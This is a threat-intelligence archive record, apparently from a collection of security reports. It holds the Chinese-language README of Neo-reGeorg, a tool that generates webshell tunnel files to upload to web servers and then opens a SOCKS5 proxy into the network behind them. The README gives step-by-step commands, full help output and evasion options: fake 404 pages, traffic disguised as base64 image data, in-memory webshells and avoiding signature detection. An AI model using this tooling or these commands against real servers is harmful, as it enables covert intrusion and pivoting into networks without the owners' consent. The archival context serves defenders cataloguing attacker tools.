{
	"id": "78fa2023-efe0-491e-82af-7c7e4b8bb135",
	"created_at": "2026-04-06T00:19:31.806815Z",
	"updated_at": "2026-04-10T03:21:39.310424Z",
	"deleted_at": null,
	"sha1_hash": "318600b2d53bf2719e065ae0a2bb733e904b90c8",
	"title": "GitHub - L-codes/Neo-reGeorg: Neo-reGeorg is a project that seeks to aggressively refactor reGeorg",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 138908,
	"plain_text": "GitHub - L-codes/Neo-reGeorg: Neo-reGeorg is a project that\r\nseeks to aggressively refactor reGeorg\r\nBy L-codes\r\nArchived: 2026-04-05 20:10:11 UTC\r\n简体中文　｜　English\r\nNeo-reGeorg 是一个旨在积极重构 reGeorg 的项目，目的是：\r\n提高可用性，避免特征检测\r\n提高 tunnel 连接安全性\r\n提高传输内容保密性\r\n应对更多的网络环境场景下使用\r\n此工具仅限于安全研究和教学，用户承担因使用此工具而导致的所有法律和相关责任！ 作者不\r\n承担任何法律和相关责任！\r\nVersion\r\n5.3.0 - 版本修改日志\r\nFeatures\r\n传输内容经过变形 base64 加密，伪装成 base64 编码\r\n采用 BLV (Byte-LengthOffset-Value) 数据格式传输数据\r\n直接请求响应可定制化 (如伪装的404页面)\r\n支持 Request 模板\r\nHTTP Headers 可定制化\r\n自定义 HTTP 响应码\r\n多 URL 随机请求\r\n服务端 DNS 解析\r\n兼容 python2 / python3\r\n服务端环境的高兼容性，如服务器不稳定、负载均衡下只在部分机器上部署了服务端等特殊情况\r\n(仅 php) 参考 pivotnacci 实现单 Session 创建多 TCP 连接，应对部分负载均衡场景\r\naspx/ashx/jsp/jspx 已不再依赖 Session，可在无 Cookie 等恶劣环境正常运行\r\n(非 php nodejs) 支持内网转发，应对负载均衡环境\r\n支持进程形式启动服务端，应对更多场景\r\npython 依赖\r\nhttps://github.com/L-codes/Neo-reGeorg/tree/master\r\nPage 1 of 5\n\npython -m pip install requests\r\n# 可选\r\npython -m pip install requests[socks] # socks5 代理支持\r\npython -m pip install curl-cffi # 改用 curl-cffi 库，提升性能和稳定性\r\npython -m pip install requests_ntlm # NTLM 认证支持\r\nBasic Usage\r\nStep 1. 设置密码生成 tunnel.(aspx|ashx|jsp|jspx|php) 并上传到WEB服务器\r\n$ python neoreg.py generate -k password\r\n [+] Create neoreg server files:\r\n =\u003e neoreg_servers/tunnel.jsp\r\n =\u003e neoreg_servers/tunnel.jspx\r\n =\u003e neoreg_servers/tunnel.ashx\r\n =\u003e neoreg_servers/tunnel.aspx\r\n =\u003e neoreg_servers/tunnel.php\r\n =\u003e neoreg_servers/tunnel.go\r\nStep 2. 使用 neoreg.py 连接 WEB 服务器，在本地建立 socks5 代理\r\n$ python3 neoreg.py -k password -u http://xx/tunnel.php\r\n+------------------------------------------------------------------------+\r\n Log Level set to [DEBUG]\r\n Starting socks server [127.0.0.1:1080]\r\n Tunnel at:\r\n http://xx/tunnel.php\r\n+------------------------------------------------------------------------+\r\nAdvanced Usage\r\n1. 支持生成的服务端，默认直接请求响应指定的页面内容 (如伪装的 404 页面)\r\n$ python neoreg.py generate -k \u003cyou_password\u003e --file 404.html --httpcode 404\r\n$ python neoreg.py -k \u003cyou_password\u003e -u \u003cserver_url\u003e --skip\r\n2. 如服务端 WEB，需要设置代理才能访问\r\n$ python neoreg.py -k \u003cyou_password\u003e -u \u003cserver_url\u003e --proxy socks5://10.1.1.1:8080\r\n3. 如需 Authorization 认证和定制的 Header 或 Cookie\r\nhttps://github.com/L-codes/Neo-reGeorg/tree/master\r\nPage 2 of 5\n\n$ python neoreg.py -k \u003cyou_password\u003e -u \u003cserver_url\u003e -H 'Authorization: cm9vdDppcyB0d2VsdmU=' --cooki\r\n4. 需要分散请求，可上传到多个路径上，如内存马\r\n$ python neoreg.py -k \u003cyou_password\u003e -u \u003curl_1\u003e -u \u003curl_2\u003e -u \u003curl_3\u003e ...\r\n5. 开启内网转发，应对负载均衡\r\n$ python neoreg.py -k \u003cyou_password\u003e -u \u003curl\u003e -r \u003credirect_url\u003e\r\n6. 使用端口转发功能，非启动 socks5 服务 ( 127.0.0.1:1080 -\u003e ip:port )\r\n$ python neoreg.py -k \u003cyou_password\u003e -u \u003curl\u003e -t \u003cip:port\u003e\r\n7. 设置请求内容模板 ( generate 的时候需要指定上)\r\n# 请求内容会替换到 NEOREGBODY 中\r\n$ python3 neoreg.py -k password -T 'img=data:image/png;base64,NEOREGBODY\u0026save=ok'\r\n$ python3 neoreg.py -k password -T 'img=data:image/png;base64,NEOREGBODY\u0026save=ok' -u http://127.0.0.1\r\n# NOTE 允许将模板内容写入文件中 -T file 即可\r\n8. 支持创建进程另起 Neoreg 服务端，可应对恶劣的特殊环境 (自行脑补) :)\r\n$ go run neoreg_servers/tunnel.go 8000\r\n$ python3 neoreg.py -k password -u http://127.0.0.1:8000/anysting\r\n9. 支持 Node.js 的内存马形式，路径修改 js 文件中 const path = '/proxy_path'; , 连接则需要带上 -\r\n-async-connect 参数\r\n$ python3 neoreg.py -k password --async-connect -u http://127.0.0.1:8000/proxy_path\r\n更多关于性能和稳定性的参数设置参考 -h 帮助信息\r\n# 生成服务端脚本\r\n$ python neoreg.py generate -h\r\n usage: neoreg.py [-h] -k KEY [-o DIR] [-f FILE] [-c CODE] [--read-buff Bytes]\r\n [--max-read-size KB]\r\n Generate neoreg webshell\r\nhttps://github.com/L-codes/Neo-reGeorg/tree/master\r\nPage 3 of 5\n\noptional arguments:\r\n -h, --help show this help message and exit\r\n -k KEY, --key KEY Specify connection key.\r\n -o DIR, --outdir DIR Output directory.\r\n -f FILE, --file FILE Camouflage html page file\r\n -c CODE, --httpcode CODE\r\n Specify HTTP response code. When using -r, it is\r\n recommended to \u003c400 (default: 200)\r\n -T STR/FILE, --request-template STR/FILE\r\n HTTP request template (eg:\r\n 'img=data:image/png;base64,NEOREGBODY\u0026save=ok')\r\n --read-buff Bytes Remote read buffer (default: 513)\r\n --max-read-size KB Remote max read size (default: 512)\r\n# 连接服务端\r\n$ python neoreg.py -h\r\n usage: neoreg.py [-h] -u URI [-r URL] [-R] [-t IP:PORT] -k KEY [-l IP]\r\n [-p PORT] [-s] [-H LINE] [-c LINE] [-x LINE] [-T STR/FILE]\r\n [-a] [--php-skip-cookie] [--go] [--php-connect-timeout S]\r\n [--local-dns] [--read-buff KB] [--read-interval MS]\r\n [--write-interval MS] [--max-threads N] [--max-retry N]\r\n [--cut-left N] [--cut-right N] [--extract EXPR]\r\n [--ntlm-auth USER:PASS] [-v]\r\n Socks server for Neoreg HTTP(s) tunneller (DEBUG MODE: -k debug)\r\n optional arguments:\r\n -h, --help show this help message and exit\r\n -u URI, --url URI The url containing the tunnel script\r\n -r URL, --redirect-url URL\r\n Intranet forwarding the designated server (only\r\n java/.net)\r\n -R, --force-redirect Forced forwarding (only jsp -r)\r\n -t IP:PORT, --target IP:PORT\r\n Network forwarding Target, After setting this\r\n parameter, port forwarding will be enabled\r\n -k KEY, --key KEY Specify connection key\r\n -l IP, --listen-on IP\r\n The default listening address (default: 127.0.0.1)\r\n -p PORT, --listen-port PORT\r\n The default listening port (default: 1080)\r\n -s, --skip Skip usability testing\r\n -H LINE, --header LINE\r\n Pass custom header LINE to server\r\n -c LINE, --cookie LINE\r\n Custom init cookies\r\n -x LINE, --proxy LINE\r\nhttps://github.com/L-codes/Neo-reGeorg/tree/master\r\nPage 4 of 5\n\nProto://host[:port] Use proxy on given port\n -T STR/FILE, --request-template STR/FILE\n HTTP request template (eg:\n 'img=data:image/png;base64,NEOREGBODY\u0026save=ok')\n -a, --async-connect Asynchronous CONNECT (e.g., in PHP, Node.js)\n --php-skip-cookie Skip cookie availability check in php\n --go Use go connection method\n --php-connect-timeout S\n PHP connect timeout (default: 0.5)\n --local-dns Use local resolution DNS\n --read-buff KB Local read buffer, max data to be sent per POST\n (default: 7, max: 50)\n --read-interval MS Read data interval in milliseconds (default: 300)\n --write-interval MS Write data interval in milliseconds (default: 200)\n --max-threads N Proxy max threads (default: 400)\n --max-retry N Max retry requests (default: 10)\n --cut-left N Truncate the left side of the response body\n --cut-right N Truncate the right side of the response body\n --extract EXPR Manually extract BODY content (eg:\n\nNEOREGBODY\n\n)\n --ntlm-auth USER:PASS\n Enable NTLM authentication for web requests (format:\n DOMAIN\\USER:PASSWORD or USER:PASSWORD)\n -v Increase verbosity level (use -vv or more for greater\n effect)\nRemind\nMac OSX 上运行 neoreg.py 时，高并发请求会出现网络丢包情况，可通过 ulimit -n 2560 修改\n当前 shell 的 \"最大文件打开数\"\nLicense\nGPL 3.0\nStar History Chart\nStar History Chart\nSource: https://github.com/L-codes/Neo-reGeorg/tree/master\nhttps://github.com/L-codes/Neo-reGeorg/tree/master\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://github.com/L-codes/Neo-reGeorg/tree/master"
	],
	"report_names": [
		"master"
	],
	"threat_actors": [],
	"ts_created_at": 1775434771,
	"ts_updated_at": 1775791299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/318600b2d53bf2719e065ae0a2bb733e904b90c8.pdf",
		"text": "https://archive.orkl.eu/318600b2d53bf2719e065ae0a2bb733e904b90c8.txt",
		"img": "https://archive.orkl.eu/318600b2d53bf2719e065ae0a2bb733e904b90c8.jpg"
	}
}